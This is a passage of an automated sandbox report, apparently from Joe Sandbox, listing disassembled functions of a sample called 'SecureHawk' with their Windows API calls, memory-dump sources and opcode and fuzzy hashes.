                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0037B5A4
                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0037B5BC
                                  • GetSystemMetrics.USER32(00000004), ref: 0037B5E5
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00361340,00000000), ref: 0037B603
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$Long$MetricsSystem
                                  • String ID:
                                  • API String ID: 2294984445-0
                                  • Opcode ID: 84cafed7da24f880a93b76d7f391ea15f4ebe353a06f3bc0e6e92ec5e4704777
                                  • Instruction ID: 78019c6080a6165248c8a2a25ee6ce0dea14384b884b9d92e600c83612d0aa77
                                  • Opcode Fuzzy Hash: 84cafed7da24f880a93b76d7f391ea15f4ebe353a06f3bc0e6e92ec5e4704777
                                  • Instruction Fuzzy Hash: 2B219471614215AFCB269F39CC04B69BBB9FB06735F118728FA29D35E0E7348914CB50
                                  APIs
                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002F1729
                                  • SelectObject.GDI32(?,00000000), ref: 002F1738
                                  • BeginPath.GDI32(?), ref: 002F174F
                                  • SelectObject.GDI32(?,00000000), ref: 002F1778
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$BeginCreatePath
                                  • String ID:
                                  • API String ID: 3225163088-0
                                  • Opcode ID: f1e64fd63033017c831560a6c5f0f3b910579b1500ef9d2b83fd6d46dc5a304e
                                  • Instruction ID: d9401e3ddef4298ef501e66c963550a4754f0bce3620a429bb507cd662164703
                                  • Opcode Fuzzy Hash: f1e64fd63033017c831560a6c5f0f3b910579b1500ef9d2b83fd6d46dc5a304e
                                  • Instruction Fuzzy Hash: DC21907181030DEBDB129F24EC45779BBBCBB00365F544326FA18D21A1D7B988A5CB90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID:
                                  • API String ID: 2931989736-0
                                  • Opcode ID: 19799509ae9627d158ed993387aa60121a85009e971701d6a75c53b813f2aa2e
                                  • Instruction ID: 94ed9ed1def01d3fc7fb09e97640a867f4707e65574ce3df04b505ecb2aca5d3
                                  • Opcode Fuzzy Hash: 19799509ae9627d158ed993387aa60121a85009e971701d6a75c53b813f2aa2e
                                  • Instruction Fuzzy Hash: AE01F9A17132057BD21765115C42FF7B79D9E55784B06A052FE05DE241E625FE20C2A8
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00354EE2
                                  • __beginthreadex.LIBCMT ref: 00354F00
                                  • MessageBoxW.USER32(?,?,?,?), ref: 00354F15
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00354F2B
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00354F32
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                  • String ID:
                                  • API String ID: 3824534824-0
                                  • Opcode ID: 7ed3d1fbe928255f9ff290f9ffbe478094c10ef524370e92230ff96ca7484a91
                                  • Instruction ID: 43e7071e01d4da941e9c3ba6c0962f7a2c1d3460f299805578498b0f6c14d595
                                  • Opcode Fuzzy Hash: 7ed3d1fbe928255f9ff290f9ffbe478094c10ef524370e92230ff96ca7484a91
                                  • Instruction Fuzzy Hash: 121108B6904304BBD7078FAC9C09EDE7BACEB45325F150399FD24D72A1D679894887A0
                                  APIs
                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00348C1F
                                  • GetLastError.KERNEL32(?,003486E3,?,?,?), ref: 00348C29
                                  • GetProcessHeap.KERNEL32(00000008,?,?,003486E3,?,?,?), ref: 00348C38
                                  • HeapAlloc.KERNEL32(00000000,?,003486E3,?,?,?), ref: 00348C3F
                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00348C56
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                  • String ID:
                                  • API String ID: 842720411-0
                                  • Opcode ID: 2522fa1703d90904cf8fe257eacca5f9cef37c450c51194b3588b1ba1ab4f6f8
                                  • Instruction ID: c2e9f38f0beffc55f3a3c97f33c9b16ddf591c2c70b539e57810fbf78d7d21ee
                                  • Opcode Fuzzy Hash: 2522fa1703d90904cf8fe257eacca5f9cef37c450c51194b3588b1ba1ab4f6f8
                                  • Instruction Fuzzy Hash: B7016D75601304BFDB264FB9ECC8DAB7BACEF89764B100469F848D6220DA319D15CBB0
                                  APIs
                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00355688
                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00355696
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0035569E
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003556A8
                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003556E4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 1c7f24adb6c2a6a7baca7e310ecd6e3279d3c9e1c585d998657e176e996b89eb
                                  • Instruction ID: 1121ed0803ce59a58a1cf4dcda62f0b3ac77c82e88518f298262e814b20da7c9
                                  • Opcode Fuzzy Hash: 1c7f24adb6c2a6a7baca7e310ecd6e3279d3c9e1c585d998657e176e996b89eb
                                  • Instruction Fuzzy Hash: B0012D35D41A1DDBCF06AFE4D86C9EEBBBCFB08712F411496E901B2150CB30A55887A1
                                  APIs
                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?,?,?,00347E56), ref: 00347B28
                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?,?), ref: 00347B43
                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?,?), ref: 00347B51
                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?), ref: 00347B61
                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?,?), ref: 00347B6D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                  • String ID:
                                  • API String ID: 3897988419-0
                                  • Opcode ID: 0857854beb44bc946027de2b406c656177b6af05189183cf8b463a75783b5f9d
                                  • Instruction ID: 3f4bfb3cf7f646808831b066d5de8ee7a3ca5cc71d3bafcf9050eb39bc616973
                                  • Opcode Fuzzy Hash: 0857854beb44bc946027de2b406c656177b6af05189183cf8b463a75783b5f9d
                                  • Instruction Fuzzy Hash: 9C017C76601304BBDB164F74EC48AAA7BEDEF84752F154068F908DA210E771ED40CBA0
                                  APIs
                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00348AC1
                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00348ACB
                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00348ADA
                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00348AE1
                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00348AF7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                  • String ID:
                                  • API String ID: 44706859-0
                                  • Opcode ID: 50eec51938e0e942d4cd14147b2cc02d172a0f21c008977947d0b6681302ef6c
                                  • Instruction ID: 2ded646d5416e3285b0144e7b103b1c0d40d0c2f49ac905e1ce4093f40fdfb7c
                                  • Opcode Fuzzy Hash: 50eec51938e0e942d4cd14147b2cc02d172a0f21c008977947d0b6681302ef6c
                                  • Instruction Fuzzy Hash: 9EF0C275204304AFEB560FA4DC8DE6B3BACEF8A768F000055F904C6150DB71EC04DB60
                                  APIs
                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00348B22
                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00348B2C
                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00348B3B
                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00348B42
                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00348B58
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                  • String ID:
                                  • API String ID: 44706859-0
                                  • Opcode ID: e6b96bd9a9a8cbb2549ce992852ccfeeebc290436dbfb33626ff5186c0efdeb0
                                  • Instruction ID: 359122ecba7c63412c09ee95c21e0efd552a2bbd2c913d7b635185a4ec1c59e4
                                  • Opcode Fuzzy Hash: e6b96bd9a9a8cbb2549ce992852ccfeeebc290436dbfb33626ff5186c0efdeb0
                                  • Instruction Fuzzy Hash: 04F0AF75200304AFEB530FA4EC8CE6B3BACEF89754F000069F904DA160DA60A804DB61
                                  APIs
                                  • GetDlgItem.USER32(?,000003E9), ref: 0034CB73
                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0034CB8A
                                  • MessageBeep.USER32(00000000), ref: 0034CBA2
                                  • KillTimer.USER32(?,0000040A), ref: 0034CBBE
                                  • EndDialog.USER32(?,00000001), ref: 0034CBD8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                  • String ID:
                                  • API String ID: 3741023627-0
                                  • Opcode ID: 559567b6bd8d18f52762e0d2e7969c1871fffff4235d14be005a879854528a9b
                                  • Instruction ID: 85ee0c4c694610c23e1f6f1b77a648f2fa1e9ec96429e9e3597667957b9d0db1
                                  • Opcode Fuzzy Hash: 559567b6bd8d18f52762e0d2e7969c1871fffff4235d14be005a879854528a9b
                                  • Instruction Fuzzy Hash: B2016230551708ABEB665B50DD4EFA677BCFF00705F000699F582654E0DBE1B9588F90
                                  APIs
                                  • EndPath.GDI32(?), ref: 002F179B
                                  • StrokeAndFillPath.GDI32(?,?,0032BAF9,00000000,?), ref: 002F17B7
                                  • SelectObject.GDI32(?,00000000), ref: 002F17CA
                                  • DeleteObject.GDI32 ref: 002F17DD
                                  • StrokePath.GDI32(?), ref: 002F17F8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                  • String ID:
                                  • API String ID: 2625713937-0
                                  • Opcode ID: 511f535cb3652d8549194e736fdeb0e0082d37358b02ea70ff23f09d1af59bf9
                                  • Instruction ID: fe9ef81f8883f953e14c7c66214bde2cad6e98faac8291b19b6b2a113cbce0a6
                                  • Opcode Fuzzy Hash: 511f535cb3652d8549194e736fdeb0e0082d37358b02ea70ff23f09d1af59bf9
                                  • Instruction Fuzzy Hash: 5DF0197101430DEBDB5B6F25EC0D768BBA8AB0036AF448364EA2D840F1C73949A9DF50
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 0035C8E2
                                  • CoCreateInstance.OLE32(00383D3C,00000000,00000001,00383BAC,?), ref: 0035C8FA
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                  • CoUninitialize.OLE32 ref: 0035CB67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                  • String ID: .lnk
                                  • API String ID: 2683427295-24824748
                                  • Opcode ID: cfab5061cc2ca725b104705f78c98301ce9a83de346f1a9833823fd5e013fd3c
                                  • Instruction ID: ec888346a618fa0fbb127be7ce540163d617af18c5e62911a7fe45741d71e5a9
                                  • Opcode Fuzzy Hash: cfab5061cc2ca725b104705f78c98301ce9a83de346f1a9833823fd5e013fd3c
                                  • Instruction Fuzzy Hash: 86A14F71114205AFD301EF64C891EABB7E8EF94748F00496CF6559B1A1EBB0EA49CB92
                                  APIs
                                    • Part of subcall function 00310F16: std::exception::exception.LIBCMT ref: 00310F4C
                                    • Part of subcall function 00310F16: __CxxThrowException@8.LIBCMT ref: 00310F61
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 00301680: _memmove.LIBCMT ref: 003016DB
                                  • __swprintf.LIBCMT ref: 002FE598
                                  Strings
                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002FE431
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                  • API String ID: 1943609520-557222456
                                  • Opcode ID: f2dcaf161e200a5330d6047be19f4cb3300a1547e04699722a0ee1796c570b13
                                  • Instruction ID: cee3e4c4797f2da81f977629819c5962e546d57871268584aa512919475faa49
                                  • Opcode Fuzzy Hash: f2dcaf161e200a5330d6047be19f4cb3300a1547e04699722a0ee1796c570b13
                                  • Instruction Fuzzy Hash: AE91B1711142059FC71AEF24C896C7FB7A8EF95740F41092DF5929B2A1EB70EE48CB92
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 003151FD
                                    • Part of subcall function 00320250: __87except.LIBCMT ref: 0032028B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorHandling__87except__start
                                  • String ID: pow
                                  • API String ID: 2905807303-2276729525
                                  • Opcode ID: 61cc103239efc2e7ab28b1e0a5cb866a3e54c8714b8b7da2f6f0cb5db828abde
                                  • Instruction ID: 42884b08b428509e08b074e14608bc927bb7f32437f4ff371793b1424d7473fc
                                  • Opcode Fuzzy Hash: 61cc103239efc2e7ab28b1e0a5cb866a3e54c8714b8b7da2f6f0cb5db828abde
                                  • Instruction Fuzzy Hash: A5519732908701D7CB1FB714E8413AE7B98AB84740F218D69E0D5861ABEF348CD99A46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #$+
                                  • API String ID: 0-2552117581
                                  • Opcode ID: 68863ca18e2abf608f06f24194c13f7c67da38696664fdfa7ab31ffc1c53fa44
                                  • Instruction ID: 235cbc1986c8eda0abfdebd5886c2c1742165c01f71364ffe1e17240fcb17e86
                                  • Opcode Fuzzy Hash: 68863ca18e2abf608f06f24194c13f7c67da38696664fdfa7ab31ffc1c53fa44
                                  • Instruction Fuzzy Hash: 29512071104215CFDF1BDF28C8526FA7BA8EF5A310F164056E8819F291DB74EC96CB62
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove$_free
                                  • String ID: #V0
                                  • API String ID: 2620147621-259189717
                                  • Opcode ID: d22689c055c4d6b6641a767a8be2b9e4008fc26d2c64fede02d26fee45822fa4
                                  • Instruction ID: 209df4d5be0bb4e7168293c728e795060409f2a66be9c31eeee1b826cde62ac8
                                  • Opcode Fuzzy Hash: d22689c055c4d6b6641a767a8be2b9e4008fc26d2c64fede02d26fee45822fa4
                                  • Instruction Fuzzy Hash: 2A516A716143058FDB2ACF29C481B6BBBE5BF89354F45482DF98A8B360E731E851CB52
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memset$_memmove
                                  • String ID: ERCP
                                  • API String ID: 2532777613-1384759551
                                  • Opcode ID: cb6de71228b869efddfd8289b0c603b1ee9fe7b4e3857a1d5261ffe0ae0d3d5f
                                  • Instruction ID: 58959412749967b8684281df75cbfeead03dd63eb98a5295bb4ffaf7ecc02c01
                                  • Opcode Fuzzy Hash: cb6de71228b869efddfd8289b0c603b1ee9fe7b4e3857a1d5261ffe0ae0d3d5f
                                  • Instruction Fuzzy Hash: 8851D271A01705DBDB26CF65C8517ABB7F8EF04300F25456EE88ADB291E774EA81CB41
                                  APIs
